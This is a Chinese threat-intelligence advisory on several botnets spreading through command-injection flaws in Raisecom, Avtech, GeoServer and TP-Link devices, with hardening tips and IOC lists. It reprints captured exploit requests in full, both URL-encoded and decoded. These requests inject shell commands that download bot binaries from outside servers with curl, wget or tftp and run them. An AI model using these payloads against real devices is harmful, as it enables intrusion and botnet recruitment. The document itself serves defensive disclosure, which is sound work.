多个僵尸网络正利用Raisecom MSG1200 命令执行漏洞(CVE-2024-7120)传播
2024-11-12 14:33:0 Author: mp.weixin.qq.com(查看原文) 阅读量:0 收藏

近期,360安全大脑监测发现多个僵尸网络正利用Raisecom MSG1200 命令注入漏洞(CVE-2024-7120)发起攻击。进一步分析发现,45.202.32.0/22下更是托管了5个僵尸网络,该僵尸网络群目前已知的21个下载服务器部署在全球多个国家,并在攻击活动中利用了4个较新漏洞:CVE-2024-7120、Avtech网络摄影机命令注入漏洞(CVE-2024-7029)、GeoServer 远程代码执行漏洞(CVE-2024-36401)、TP-LINK Archer AX21命令注入漏洞(CVE-2023-1389)。

上述僵尸网络均在快速迭代中且C2更换频繁,值得安全社区引起注意。

一、CVE-2024-7120漏洞简介
二、45.202.32.0/22下托管的5个僵尸网络

分析发现45.202.35.94下托管了5个僵尸网络家族(AISURU新变种、CodingDrunk、CatDDoS、HitlerBot、Pyinstaller打包的Flooder),其利用CVE-2024-7120传播的Payload如下:

攻击Payload:
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20rm%20-rf%20tplink%3B%20curl%20http%3A//45.202.35.94/tplink%20--output%20tplink%3B%20chmod%20777%20tplink%3B%20./tplink%20raisecom%60            
URL解码后:
GET /vpn/list_base_config.php?type=mod&parts=base_config&template=`cd /tmp; rm -rf tplink; curl http://45.202.35[.]94/tplink --output tplink; chmod 777 tplink; ./tplink  raisecom`

如下是该僵尸网络群下发攻击Payload IP及下载服务器的关系图,图标实体越大表示关联的IP越多,可以看到僵尸网络群下载服务器集中在45.202.32.0/22、154.216.16.0/22地址块,且两个地址块下均托管了多个不同的僵尸网络,5个僵尸网络中CatDDoS、HitlerBot僵尸网络关联的IP最多。

2.1 AISURU僵尸网络新变种

45.202.35.94下托管的df43d2ca27b6e4758f3474632b9e80c6(http://45.202.35[.]94/bin)与9723e763c912093d46d718c88f2461ce(http://92.60.77.85/meow[.]arm7、http://45.140.192.221/meow[.]arm7)的对比如下:
1)非常相似的上线包
都带有与猫相关的明文特征字符串(meow<猫叫声>、Kitty-Kitty-Kitty)
运行参数:若未带参数,则为unknown,此时总长度均为9字节 
2)两个样本中均有与猫相关的特征字符串(meow)
9723e763c912093d46d718c88f2461ce解密后的配置表项:
dvrhelpers.su|ipcamlover.ru|xlabresearch.ru|xlabsecurity.ru
cat
meow!
Kitty-Kitty-Kitty
3)下载链接中与猫相关的特征字符串(meow)
9723e763c912093d46d718c88f2461ce的下载链接
http://92.60.77.85/meow[.]arm7
http://45.140.192.221/meow[.]arm7
如下是上述两个样本的上线包对比图:

此外, 从shell脚本5acc1e098be0808ab06003eac455557f中可知,92.60.77.85下托管了多个不同架构的AISURU僵尸程序,且9723e763c912093d46d718c88f2461ce的上线包、C2 domain构造及获取方式与AISURU非常相似,因此可确认其为AISURU家族新变种(通信未加密),继而可确认45.202.35.94下托管的df43d2ca27b6e4758f3474632b9e80c6也属于AISURU家族的新分支,且为比9723e763c912093d46d718c88f2461ce更早的版本(根据样本发现时间及功能复杂度)。

2.2 CodingDrunk僵尸网络  

45.202.35.94下还托管了一类新的Mirai变种,因该变种C2域名多包含f.codingdrunk.cc(如:9492e2ff8e6295ee99ee1060aa36e7de),遂命名为CodingDrunk僵尸网络。

值得注意的是,45.202.35.94下托管的多个 CodingDrunk僵尸程序还被托管在87.121.112.46下(对应valapedia.com、 www.valapedia.com 、onemk3.teracomm.mk),如:8bc4be648ddcab2117cd182caf9c74a1(http://45.202.35[.]94/arm5)。
该僵尸网络主要利用Avtech网络摄影机命令注入漏洞(CVE-2024-7029)、TP-LINK Archer AX21命令注入漏洞(CVE-2023-1389)进行传播,其利用CVE-2024-7029传播的Payload如下:

POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1

action=white_led&brightness=$(cd%20/tmp;%20rm%20-rf%20wget.sh;%20wget%20http://87.121.112.46/wget.sh;%20chmod%20777%20wget.sh;%20./wget.sh%20avtech;%20rm%20-rf%20wget.sh%202>%261)#

解码后:

POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1

action=white_led&brightness=$(cd /tmp; rm -rf wget.sh; wget http://87.121.112.46/wget.sh; chmod 777 wget.sh; ./wget.sh avtech; rm -rf wget.sh 2>&1)#

利用CVE-2023-1389传播的Payload如下:

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id>`cd /tmp; rm -rf wget.sh; wget http://87.121.112.46/wget.sh; chmod 777 wget.sh; ./wget.sh tplink; rm -rf wget.sh

2.3 CatDDoS僵尸网络

此外,45.202.35.94下还托管了大量CatDDoS僵尸程序,如:33eefdf58dc272eb3c6cc47f2c782d13被托管在45.202.35.36、45.202.35.88、45.202.35.94、178.215.238.8四个服务器下。
同时,45.202.35.88、45.202.35.36两个IP还会利用GeoServer 远程代码执行漏洞(CVE-2024-36401)、TP-LINK Archer AX21命令注入漏洞(CVE-2023-1389)两个漏洞进行入侵传播,其利用CVE-2024-36401传播的Payload如下:

GET /geoserver/wfs?request=GetPropertyValue&service=wfs&typeNames=topp:states&valueReference=exec(java.lang.Runtime.getRuntime(),"rm x86; curl --output x86 http://45.202.35.88/x86; chmod 777 x86; ./x86 geo")&version=2.0.0

利用CVE-2023-1389传播的Payload如下:

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf tplink; wget http://45.202.35.88/tplink; chmod 777 tplink; ./tplink tplink; rm -rf tplink`

2.4 HitlerBot僵尸网络

45.202.35.94下托管的多个 HitlerBot僵尸程序还被托管在45.202.35.36、154.216.17.171、154.216.17.217、154.216.18.237、154.216.18.196、154.216.18.103、154.216.20.232、185.157.247.125(对应www.clavity.me、clavity.me、hiroshima.accesscam.org)等多个服务器下,如:2174da285730b0a51086b015a1572704。
该僵尸网络利用TP-LINK Archer AX21命令注入漏洞(CVE-2023-1389)入侵传播的Payload如下:

POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+tplink%3B+wget+http%3A%2F%2F45.202.35.94%2Ftplink%3B+chmod+777+tplink%3B+.%2Ftplink+tplink%3B+rm+-rf+tplink%60) HTTP/1.1          

解码后:

POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf tplink; wget http://45.202.35.94/tplink; chmod 777 tplink; ./tplink tplink; rm -rf tplink`) HTTP/1.1

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id%3E%60wget+http%3A%2F%2F185.157.247.125%2Fe%2Ft+-O-+%7Csh%3B%60 HTTP/1.1

解码后:

GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=id>`wget http://185.157.247.125/e/t -O- |sh;` HTTP/1.1

2.5  Pyinstaller打包的Flooder

45.202.35.94下还托管了一类Pyinstaller打包的Flooder程序(f435d08ccd88c230b983fb410ce43367,http://45.202.35[.]94/bot),还原后的python脚本内容如下(内嵌C2: 194.165.16.26:31412),可看到其包含udp_flood、udphex_flood、tcp_flood、http_flood四种DDoS攻击方式:

三、141.98.11.136下托管的EnemyBot僵尸网络

141.98.11.136下托管了多个EnemyBot僵尸程序,其还被托管在77.37.96.100、91.92.248.237、93.123.85.123等服务器下,该僵尸网络利用CVE-2024-7120传播的Payload如下:

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60cd%20/tmp%3B%20tftp%20-g%20-r%20ppc%20141.98.11.136%2069%3B%20chmod%20777%20ppc%3B%20./ppc%20raisee%60

解码后:

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=`cd /tmp; tftp -g -r ppc 141.98.11.136 69; chmod 777 ppc; ./ppc raisee`

防范排查建议

广大用户可使用360安全大脑相关产品进行实时拦截与防护,并从以下4个方面进行加固,以免遭受黑客攻击,造成不必要的损失

Tips

1)及时更新主机漏洞补丁,将应用软件升级到安全版本;

2)服务器应配置高强度的登录密码(大小写字母、数字和特殊字符的组合密码),并定期更换密码;

3)修改ssh端口为其他端口(非22端口);

4)若非业务需要,不要在公网开放业务端口,采用本地或内网访问,设置访问白名单等方式进行加固。

附录 IOC
  • C2:
  • 45.202.35.94下托管的5类Bot:
1)AISURU新变种
junior.foxthreatnointel[.]africa
claudio.putaria[.]store    
2)CodingDrunk
srv1.pty[.]su
srv2.pty[.]su
srv3.pty[.]su
srv4.pty[.]su
srv5.pty[.]su   
srv6.pty[.]su
srv7.pty[.]su
srv8.pty[.]su
srv9.pty[.]su
srv10.pty[.]su
bins.pty[.]su
dvr[.]geek
hikvision[.]pirate
goform[.]gopher    
3)CatDDoS
LOADINGBOATS[.]DYN
servernoworky[.]geek
kingstonwikkerink[.]dyn
1kzsfuzpp7[.]parody
os0plv7xli[.]pirate
xm3m4qe0jy[.]libre
3h8d9j0ep4[.]oss
2bm7dwbfg6[.]libre
ms9ptn8tnq[.]gopher
alo0mmovgd[.]libre
1o3tl7kzd7[.]oss
3b55toec0r[.]libre
hnv60y62e1[.]libre
rjy8uw1b6l[.]oss
1yhbo2uzns[.]libre
emf57vr4mb[.]gopher
h6o1m028lg[.]parody
tzdr48n8nq[.]parody
w8l6l2f1x9[.]pirate
wyts0zprrp[.]parody
qr9o3pgshc[.]indy
a7vxi12ayz[.]oss
x4xcwuh88m[.]indy
6sfe9ri2o9[.]pirate
bncy3n6rs3[.]indy
4)HitlerBot
auschwitz.accesscam[.]org
treblinka.camdvr[.]org
hiroshima.accesscam[.]org
belzec[.]dyn
majdanek[.]dyn
5)Pyinstaller打包的Flooder
194.165.16[.]26:31412
  • 141.98.11.136下托管的EnemyBot:
enemybotnet[.]com
akamaisus[.]dyn
          
  • 下载服务器C2:
45.202.35[.]94
45.202.35[.]88
45.202.35[.]36
45.202.35[.]116
45.140.192[.]221
92.60.77[.]85
www.valapedia[.]com
valapedia[.]com
onemk3.teracomm[.]mk
87.121.112[.]46
89.32.41[.]95
178.215.238[.]8
154.216.17[.]171
154.216.17[.]210
154.216.17[.]217
154.216.18[.]103
154.216.18[.]196
154.216.18[.]237
154.216.19[.]54
154.216.19[.]59
154.216.19[.]78
154.216.20[.]109
154.216.20[.]125
154.216.20[.]232
www.clavity[.]me
clavity[.]me
hiroshima.accesscam[.]org
185.157.247[.]125
78.111.67[.]90
141.98.11[.]136
77.37.96[.]100
91.92.248[.]237
93.123.85[.]123
          
  • 下发攻击Payload的IP:    
141.255.160[.]234
178.215.238[.]13
185.224.128[.]59
185.224.128[.]83
          
  • MD5:
  • 45.202.35.94下托管的5类Bot:
1)AISURU新变种
df43d2ca27b6e4758f3474632b9e80c6
2)CodingDrunk
9af0b19ccf3455bdeeca0d85b3df935b
8bc4be648ddcab2117cd182caf9c74a1
6ba043c3fcb60f5dc8cd6967d556d920
b0aa401cdfbbe58f90c07985bfe47b43
4c3dea4888743483865b167c4aa08236
babcfdefdbb8380b84ff99c0867e791a
7e83a512690c7dcc839c63590bc6ba18
3)CatDDoS
1a1ed10a96e8aaefa616983288755b4e
1c4573e9fe89a6aa1c4cbe82538c930d
31c3c971b109db98b0d0039ba4e0e821
d0617e1c849f98002395829b1c690b62
005509a0f00c97992a06624381e8b97c
a974ea6b3f5455c461780442db802fce
1d7061e8ee1538ca9aab8ba7a1e9f63b
7c0ff60758f0c7064a50767539bbf028
4)HitlerBot
df826f33aa8e916d990e50649025bc12
e54a85ef1920828e2eb7903ea654ab11
2174da285730b0a51086b015a1572704
99b9924674a937b572912d601062f16a
fd79a8f239250749fd2cc3b8e9be3e3e
16ce1e3f0e81b4a4cbea29eb156559e3
48263f67e1277ab50eeee4813294c0f7
5)Pyinstaller打包的Flooder
f435d08ccd88c230b983fb410ce43367
还原后的py: 89fce484b19efbd66b1bc436d71afc91
  • 141.98.11.136下托管的EnemyBot:
d1912ba2b74c567e198dad1c714076bf
e92707c5b799b98cd9e09166d58930f3
77f54a0334edaa3891e2c37030e048e3
f314c4789d08e22f82ccce70bdf649b8

文章来源: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247503928&idx=1&sn=7af403fd65419eeb7d0cddc8449f1ba4&chksm=f9c1e331ceb66a2730e1f2beefdb984707c63cb41e6f500ce743928664deae30c7cb542372a4&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh